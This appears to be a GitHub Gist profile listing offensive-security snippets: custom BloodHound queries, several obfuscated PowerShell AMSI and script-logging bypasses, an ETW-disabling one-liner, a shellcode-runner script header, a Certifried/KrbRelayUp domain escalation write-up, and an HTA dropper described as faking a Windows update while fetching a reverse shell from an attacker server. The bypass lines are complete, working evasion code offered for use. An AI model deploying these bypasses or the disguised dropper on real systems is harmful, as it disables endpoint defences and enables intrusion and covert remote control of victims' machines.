Skip to content

Instantly share code, notes, and snippets.

View an00byss's full-sized avatar

An00byss an00byss

30 followers · 21 following
View GitHub Profile
@an00byss
an00byss / customqueries.json
Last active October 8, 2025 20:14
Custom bloodhound queries for BHCE
{
"queries": [
{
"name": "Find all Synchronization accounts possibly used for Entra ID Connect",
"category": "Hybrid - Users & Groups",
"queryList": [
{
"final": true,
"query": "MATCH (account) WHERE (account:User OR account:AZUser) AND (account.name =~ '(?i)^MSOL_|.*AADConnect.*' OR account.userprincipalname =~ '(?i)^sync_.*') RETURN account",
"allowCollapse": true
@an00byss
an00byss / powershell-bypasses.ps1
Created July 24, 2025 22:09 — forked from reigningshells/powershell-bypasses.ps1
Random PowerShell Bypasses
# Logging bypass:
(({}).gettype())."aSs`emblY"."Getty`PE"(('System.Manage'+'ment.Automati'+'on.Trac'+'ing.P'+'SEtwL'+'og'+'Pro'+'vi'+'d'+'e'+'r'))."gEtf`ieLD"(('etwProvi'+'de'+'r'),('Non'+'P'+'ublic,Static'))."Se`TVAL`Ue"($null,(New-Object System.Diagnostics.Eventing.EventProvider(New-Guid)))
# AMSI Bypass (old, burned)
sET-ItEM ( 'V'+'aR' + 'IA' + 'blE:1q2' + 'uZx' ) ( [TYpE]( "{1}{0}"-F'F','rE' ) ) ; ( GeT-VariaBle ( "1Q2U" +"zX" ) -VaL )."A`ss`Embly"."GET`TY`Pe"(( "{6}{3}{1}{4}{2}{0}{5}" -f'Util','A','Amsi','.Management.','utomation.','s','System' ) )."g`etf`iElD"( ( "{0}{2}{1}" -f'amsi','d','InitFaile' ),( "{2}{4}{0}{1}{3}" -f 'Stat','i','NonPubli','c','c,' ))."sE`T`VaLUE"( ${n`ULl},${t`RuE} )
# New AMSI bypass obfuscation:
@an00byss
an00byss / amsi-bypass.ps1
Created July 24, 2025 22:09 — forked from timsonner/amsi-bypass.ps1
Obfuscated AMSI bypass. [Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true)
# [Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true)
# Create a reference to the assembly with further obfuscation
$randomPart = 'A' + 'msi' + 'Utils'
$ref = [Ref]
$asm = $ref.Assembly
$amsiType = $asm.GetType('System.' + 'Management.' + 'Automation.' + $randomPart)
# Prepare the field name in a more obfuscated way
$amsiFieldName = 'amsi' + 'Init' + 'Failed'
$amsiField = $amsiType.GetField($amsiFieldName, 'NonPublic, Static')
@an00byss
an00byss / KillETW.ps1
Created March 20, 2025 18:34 — forked from tandasat/KillETW.ps1
Disable ETW of the current PowerShell session
#
# This PowerShell command sets 0 to System.Management.Automation.Tracing.PSEtwLogProvider etwProvider.m_enabled
# which effectively disables Suspicious ScriptBlock Logging etc. Note that this command itself does not attempt
# to bypass Suspicious ScriptBlock Logging for readability.
#
[Reflection.Assembly]::LoadWithPartialName('System.Core').GetType('System.Diagnostics.Eventing.EventProvider').GetField('m_enabled','NonPublic,Instance').SetValue([Ref].Assembly.GetType('System.Management.Automation.Tracing.PSEtwLogProvider').GetField('etwProvider','NonPublic,Static').GetValue($null),0)
@an00byss
an00byss / ali_ips.txt
Created March 3, 2025 17:26 — forked from charSLee013/ali_ips.txt
Alicloud full ip range
103.183.154.0/23
103.81.186.0/23
110.76.21.0/24
110.76.23.0/24
116.251.64.0/18
139.95.0.0/23
139.95.10.0/23
139.95.12.0/23
139.95.14.0/23
139.95.16.0/23
@an00byss
an00byss / pwshellcode.py
Created November 19, 2024 04:33 — forked from mcorybillington/pwshellcode.py
Simple script to tie together TrustedSec's work on running shellcode via powershell with MSFVenvom. Very little effort made to evade/hide/bypass anything, just a simple way to run shellcode in memory if you get command execution and can run PowerShell on a pentest. Stick to x86 payloads from MSFVenom.
## Credits to the following projects for a lot of this powershell code and just general inspiration
## https://github.com/chvancooten/OSEP-Code-Snippets
## https://www.trustedsec.com/blog/native-powershell-x86-shellcode-injection-on-64-bit-platforms/
from argparse import ArgumentParser
import subprocess
import base64
import os
@an00byss
an00byss / certifried_with_krbrelayup.md
Created May 10, 2024 15:30 — forked from S3cur3Th1sSh1t/certifried_with_krbrelayup.md
Certifried combined with KrbRelayUp: non-privileged domain user to Domain Admin without adding/pre-owning computer accounts

Certifried combined with KrbRelayUp

Certifried (CVE-2022-26923) gives Domain Admin from non-privileged user with the requirement adding computer accounts or owning a computer account. Kerberos Relay targeting LDAP and Shadow Credentials gives a non-privileged domain user on a domain-joined machine local admin access on (aka owning) the machine. Combination of these two: non-privileged domain user escalating to Domain Admin without the requirement adding/owning computer accounts.

The attack below uses only Windows (no Linux tools interacting with the Domain), simulating a real-world attack scenario.

Prerequisites:

@an00byss
an00byss / LICENSE
Created January 18, 2024 17:42 — forked from brianbruggeman/LICENSE
Convert Viscosity to Open VPN
Public Domain
@an00byss
an00byss / oauthServer.go
Created December 2, 2023 00:58 — forked from invokethreatguy/oauthServer.go
A mini OAuth server for Azure
package main
import (
"crypto/tls"
"fmt"
"io/ioutil"
"net/http"
"net/url"
"strings"
)
@an00byss
an00byss / Update.hta
Created January 30, 2023 18:16 — forked from r00t-3xp10it/Update.hta
meterpeter v2.10.10 - payload HTA dropper
<!--
Hta_Version: 1.0.1
Author: @r00t-3xp10it (ssa)
Application: meterpeter v2.10.10 dropper
.DESCRIPTION
This HTA changes PS 'ExecutionPolicy' to 'UnRestricted', presents a msgbox
pretending to be a security KB5005101 21H1 update, while downloads\executes
meterpeter client.ps1 (rev_tcp_shell) in background from attacker werbserver.